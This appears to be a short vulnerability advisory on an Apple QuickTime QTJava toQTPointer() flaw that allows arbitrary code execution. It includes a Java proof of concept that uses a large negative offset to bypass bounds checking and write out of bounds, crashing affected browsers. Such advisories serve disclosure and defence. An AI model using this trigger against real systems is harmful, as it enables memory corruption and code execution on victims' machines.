Apple Quicktime QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability

Apple Quicktime QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability

An exploit designed to leverage this issue was demonstrated as part of the CanSec Macbook Challenge, a competition to create a working exploit against a fully updated MacBook.

The following Java code demonstrates this issue by crashing affected browsers:

// Initialize QT
QTSession.open();

// Get a handle to anything
byte b[] = new byte[1 /*arbitrary*/];
QTHandle h = new QTHandle(b);

// Turn the handle into a pointer object. The
// large negative value throws off bounds checking.
QTPointerRef p = h.toQTPointer(-2000000000 /*off*/, 10 /*size*/);

// Write to it.
p.copyFromArray(0 /*offset*/, b /*source*/, 0, 1 /*length*/);

UPDATE (October 22, 2007): An exploit update was released by Core Security for IMPACT v7. Users can obtain this update by selecting 'Get Updates' on the IMPACT Welcome Screen.